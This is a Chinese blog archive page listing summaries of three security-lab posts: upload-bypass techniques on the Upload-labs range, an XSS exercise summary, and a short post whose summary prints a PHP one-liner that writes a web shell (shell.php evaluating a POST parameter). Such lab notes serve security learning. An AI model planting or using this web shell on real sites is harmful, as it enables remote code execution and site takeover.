2020年10月17日

快速查找我
摘要: 快速查找我 <?php fputs(fopen('shell.php','w'),'<?php @eval($_POST["cmd"])>');?> 阅读全文
posted @ 2020-10-17 08:18 Ben_John 阅读(76) 评论(0) 推荐(0) 编辑
06 文件上传
摘要: Upload-labs靶场 Pass-01:一、绕过JS验证1、BurpSuite剔除响应JS 对于JS前端验证,直接删除掉JS代码之后就可以绕过JS验证。 BurpSuite中Proxy-->Options-->Remove all JavaScript2、浏览器审计工具剔除JS 利用浏览器的审查 阅读全文
posted @ 2020-10-17 08:15 Ben_John 阅读(151) 评论(0) 推荐(0) 编辑
XSS(跨站脚本攻击)小结
摘要: 靶机地址:https://xss-quiz.int21h.jp/ XSS漏洞发现:设置独一无二字符串提交,在响应中查找。 定义和用法onmouseover 属性在鼠标指针移动到元素上时触发。注释:onmouseover 属性不适用以下元素:<base>、<bdo>、<br>、<head>、<html 阅读全文
posted @ 2020-10-17 07:45 Ben_John 阅读(2764) 评论(0) 推荐(0) 编辑

导航